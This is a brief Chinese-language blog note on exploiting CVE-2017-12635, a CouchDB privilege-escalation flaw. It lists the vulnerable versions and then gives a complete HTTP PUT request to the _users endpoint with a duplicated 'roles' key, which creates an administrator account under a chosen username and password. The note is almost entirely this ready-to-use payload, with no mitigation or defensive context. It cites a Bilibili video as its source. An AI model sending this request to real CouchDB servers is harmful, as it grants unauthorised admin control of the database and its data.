【笔记】CVE-2017-12635漏洞利用

发表于 更新于 阅读次数:

前言

CouchDB垂直权限绕过漏洞

漏洞利用前提

  • CouchDB 1.x(<1.7.0)
  • CouchDB 2.x(<2.1.1)

payload

<username>:定义管理员用户名
<password>:定义管理员密码

request
1
2
3
4
5
6
7
8
9
10
PUT http://127.0.0.1:5984/_users/org.couchdb.user:<username>
Content-Type: application/json

{
  "type": "user",
  "name": "<username>",
  "roles": ["_admin"],
  "roles": [],
  "password": "<password>"
}

完成

参考文献

哔哩哔哩——xiaodisec